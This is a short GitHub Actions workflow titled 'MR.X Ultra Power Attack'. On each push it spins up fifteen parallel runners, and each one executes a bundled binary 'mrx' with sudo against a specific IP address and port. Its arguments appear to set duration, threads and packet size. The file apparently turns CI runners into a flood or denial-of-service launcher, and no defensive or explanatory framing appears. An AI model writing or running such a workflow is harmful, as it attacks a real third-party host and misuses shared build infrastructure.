name: MR.X Ultra Power Attack
on: [push]

jobs:
  mrx:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,
            11,12,13,14,15]
    steps:
    - uses: actions/checkout@v3
    - run: chmod +x mrx
    - run: sudo ./mrx 74.225.177.25 29392 200 64 150
